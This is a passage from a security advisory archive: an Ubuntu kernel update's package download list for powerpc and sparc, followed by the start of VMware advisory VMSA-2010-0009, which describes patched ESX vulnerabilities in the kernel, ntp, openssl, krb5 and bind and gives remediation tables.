http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   347790 a0f546d60939ffbf2481b86756662723
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  3204080 9f894434b4c0ec2727354479a4832e69
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  2182252 85e8a43b037dd81d30470c549970c946
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  3120804 a116d297928f1f9fc6d414e85f4d494f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-cell_2.6.22-14.51_powerpc.deb
  Size/MD5:   658278 db54b942af04eb0c43a521e6df67e685
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb
  Size/MD5:   567080 b712399ae49807be6b86c11977f4c435
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb
  Size/MD5:   571742 5dca014dc429cde88290aee0fa6f9466
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb
  Size/MD5:   566790 46f601e71b40dbee4b20844982160642
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-cell_2.6.22-14.51_powerpc.deb
  Size/MD5: 19764838 a6c5c34b2d448719fbe7465d5db5aa0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb
  Size/MD5: 18708782 e9719b9339d69fadcf3bf5022d4a2e95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb
  Size/MD5: 19743012 15c44ee1d0df2a3a77104dd5ac878b2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb
  Size/MD5: 18483398 a42260daefab364bb17170ab530d4f3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_powerpc.deb
  Size/MD5:   629122 523711ed75266796795fed665de37a9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   298636 3eeeaa21b5adc86ac2c9e1cd45fb1b0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   256436 f8f345041049311ddf1410da74cdb40c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   298540 0491df9de452fc1175a8d7e8dc0c6fef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   173312 074bfedb47a5f28b1a3f3469433a9113
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   159598 7e5e5213920503815666460a5f31e456
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   173266 225154854c11fde96fcf69cbad5aa383
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   288550 0b4f4f9c42e90eae5447bf6bbacaea64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   256366 33f669c1a356a8551e9934b71ef4c56c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   288484 2104568d5fba36a95c7e64f38866e63c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  1931632 53ff6c998913a0a04510d6b6e7708694
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  1654746 6ef0176c868ab202269c364ea7d9bf9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  1909798 b0e590a2e8501a4c479f0b40b23d2200
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   216058 874ff3bd336c5efee7df9aad59b14c9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   234428 23b4066629a576b8d67a6c1993d726b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   224102 684574c3567381ab1ef4d92d329fbdaa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   181638 7a90c86bb89a87fe957d964a576006ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   153854 fd439ba89e3716a4f8f4a9c8014d2345
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   181568 b9ee9056cf15a549a1bc44eeeb2ee0dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   103618 a8ff35b79df674ee7938ea9be92d6d8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    86732 4687704bf65014f8651a7c602227c567
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   103486 70e6f3bb35e15d13496960774b292b89
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    46968 05c98002c23ca01e4cbaec75120c0386
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    45402 3d1c1d0d6daa2d1c342f3e9c41d3512a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    46990 773bf46f2de692c06a95379becb32efe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    54466 4675526f52be9e1a6977f6ed2ac4b45a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    41566 f9841c40936c89373d8bf06a115605a6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    47800 cf9c25932005676016484ab1fb8e23ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    87028 cb0314c3b2b71f2052b2c340ea1fd5d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    74044 65d10ff25d7b0aa1f436504b84237e4d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    87000 401f6db031db7e82765812813d2f19eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    30294 8c1d9387ecd25871638d1f1fdf4299ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    76262 9c321effb70e67c0ca38111c0439b23e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    30320 cac5ab46451e109e4aa8f0b2fcdd3edb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:     9944 cfb6f2dec7da13af5ac94bb90a7b07e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:     8456 6a8b453c691e0d5a83e7405f72512635
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:     9946 3f6bc2f6cb3bdfefa798d0b0ef8973ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    68470 bcdc3d8d53f6cea1eb0eaa9d64a3007f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    56868 dc2cdc8c4ec09bee63614de403167d05
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    68450 cd1d3cd23bf3234be5607c6a79a10a30
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   131420 e67fb172159455d82c04f0a86e607f35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    87802 3c118e73f1456e8267026c1a82104cae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   131242 1f1aaed227c6f475f312333a99251435
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  1432142 aa733ab34026296af001d282b83ed756
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  1441252 f474ebdbf144a7dd86ca2de964bbe003
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:  1432056 3aaab714864bf27fb4c152ac8fa6209d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    70942 d26e171c9b6b3a80b442fb4f5525a1ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    75506 b3bfa244684cbebc8830b72a77e7f4ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    84750 77311918b0eaf6d58922eb04ed0a95cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    14528 428222023bf05f4f448c88960f8b9f0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    12526 23e4a0793d3287323f94e23621a5d34f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    14528 004dee3afbe741bc92e07d1e13fe46bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   558358 c187edbade80249854e6f826a3896033
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   492718 58c3eae42399c3bd2e76d26c5f546fc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   549324 dcdbf765e239b792c41b27c82b603153
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   105356 41e99bfc7b583339323fb76beb86a635
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:    79660 b4ba9625685b845ad14cf3d07178544e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb
  Size/MD5:   104298 dc9e68d7635ecd9289b56179763cf19d

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    59314 48e9a8ed9f2b56a8b8cb51a273a06ede
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    68264 a2d332c0643bf6b1a4e53cae6f3bfe9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    42126 e79a1e7135eabf2d9d497eeb0ff5a063
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    95324 22b9cde814f894b66be8d5e85493b043
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   594028 4e82b58f932c9b8d38db5c4d9fe3274c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   169366 6f6d29a958b09979738bb3b17040fed7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    38250 c5bb908a6b4ba4c2df0854c0547694ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    38640 ccad5e69ca054d862cdd01de9f8c3608
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   154608 309598ae61ea2055a1105eb95dd04395
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:  1992728 62f6bbcd5d90bccddf1c03bd6dc811e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb
  Size/MD5:   475656 983165021233a6f4818f3d7df6dd480c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb
  Size/MD5:   474000 14ab54585c4f5fe06361e10c48735c8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb
  Size/MD5: 12414922 f8fbde5e6de9d1cfe385c521f3ff55d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb
  Size/MD5: 12180792 cf2ad7921f617b3e85978603851d782c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_sparc.deb
  Size/MD5:   683970 daeaffb36d535c6c5ff100446777a168
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   265804 e16972aa57e535422ec219d703fe2b0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   159904 aed2604b943ac15347285ba2ccaed7e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   247420 c13d045745e03c9e41f443ce8cda80cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:  1253996 792ab6d6a423e5a8c2f6ca51b4026140
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   159994 3cc047df902584eba563a584523744ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    91956 68fb5604af7f1f3f5c6d63a7192d4567
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    40628 101c44a6ad87402a2ce0708438e956d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    38578 b728e295a5ae24b60648fa54e9cc96c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:     8642 0f86cab5b1e20475cd33cf50d04a32f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    60062 6eb9bf4be178a0d732cf373868a6e08a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    90988 158d88a7ce2a3206abb3a789b261fc43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   875868 f92fdfed5a7b07bcb27d676e648ebf24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:     9756 c9f533a3f3ec1cc8d52930f2c59a5ee7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:   369260 3da59dbc90209256155801d4a2398135
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb
  Size/MD5:    56884 adc85553e31023c42ef7c8623154a9a9

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2010-0009 Synopsis: ESXi ntp and ESX Service Console third party updates Issue date: 2010-05-27 Updated on: 2010-05-27 (initial release of advisory) CVE numbers: CVE-2009-2695 CVE-2009-2908 CVE-2009-3228 CVE-2009-3286 CVE-2009-3547 CVE-2009-3613 CVE-2009-3612 CVE-2009-3620 CVE-2009-3621 CVE-2009-3726 CVE-2007-4567 CVE-2009-4536 CVE-2009-4537 CVE-2009-4538 CVE-2006-6304 CVE-2009-2910 CVE-2009-3080 CVE-2009-3556 CVE-2009-3889 CVE-2009-3939 CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4141 CVE-2009-4272 CVE-2009-3563 CVE-2009-4355 CVE-2009-2409 CVE-2009-0590 CVE-2009-1377 CVE-2009-1378 CVE-2009-1379 CVE-2009-1386 CVE-2009-1387 CVE-2009-4212 CVE-2009-1384 CVE-2010-0097 CVE-2010-0290 CVE-2009-3736 CVE-2010-0001 CVE-2010-0426 CVE-2010-0427 CVE-2010-0382


  1. Summary

ESXi update for ntp and ESX Console OS (COS) updates for COS kernel, openssl, krb5, gcc, bind, gzip, sudo.

  1. Relevant releases

VMware ESX 4.0.0 without patches ESX400-201005401-SG, ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG, ESX400-201005405-SG, ESX400-201005409-SG

  1. Problem Description

a. Service Console update for COS kernel

Updated COS package "kernel" addresses the security issues that are
fixed through versions 2.6.18-164.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,
CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues
fixed in kernel 2.6.18-164.6.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,
CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,
CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
the security issues fixed in kernel 2.6.18-164.11.1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

b. ESXi userworld update for ntp

The Network Time Protocol (NTP) is used to synchronize the time of
a computer client or server to another server or reference time
source.

A vulnerability in ntpd could allow a remote attacker to cause a
denial of service (CPU and bandwidth consumption) by using
MODE_PRIVATE to send a spoofed (1) request or (2) response packet
that triggers a continuous exchange of MODE_PRIVATE error responses
between two NTP daemons.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3563 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.0       ESXi     ESXi400-201005401-SG
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable

vMA            any       RHEL5    not applicable
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

c. Service Console package openssl updated to 0.9.8e-12.el5_4.1

OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with
full-strength cryptography world-wide.

A memory leak in the zlib could allow a remote attacker to cause a
denial of service (memory consumption) via vectors that trigger
incorrect calls to the CRYPTO_cleanup_all_ex_data function.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4355 to this issue.

A vulnerability was discovered which may allow remote attackers to
spoof certificates by using MD2 design flaws to generate a hash
collision in less than brute-force time. NOTE: the scope of this
issue is currently limited because the amount of computation
required is still large.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-2409 to this issue.

This update also includes security fixes that were first addressed
in version openssl-0.9.8e-12.el5.i386.rpm.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,
CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending**
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion. ** see VMSA-2010-0004

d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to 2.2.14-15.

Kerberos is a network authentication protocol. It is designed to
provide strong authentication for client/server applications by
using secret-key cryptography.

Multiple integer underflows in the AES and RC4 functionality in the
crypto library could allow remote attackers to cause a denial of
service (daemon crash) or possibly execute arbitrary code by
providing ciphertext with a length that is too short to be valid.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4212 to this issue.

The service console package for pam_krb5 is updated to version
pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In
some non-default configurations (specifically, where pam_krb5 would
be the first module to prompt for a password), a remote attacker
could use this flaw to recognize valid usernames, which would aid a
dictionary-based password guess attack.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1384 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005406-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2

BIND (Berkeley Internet Name Daemon) is by far the most widely used
Domain Name System (DNS) software on the Internet.

A vulnerability was discovered which could allow remote attacker to
add the Authenticated Data (AD) flag to a forged NXDOMAIN response
for an existing domain.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0097 to this issue.

A vulnerability was discovered which could allow remote attackers
to conduct DNS cache poisoning attacks by receiving a recursive
client query and sending a response that contains CNAME or DNAME
records, which do not have the intended validation before caching.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0290 to this issue.

A vulnerability was found in the way that bind handles out-of-
bailiwick data accompanying a secure response without re-fetching
from the original source, which could allow remote attackers to
have an unspecified impact via a crafted response.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0382 to this issue.

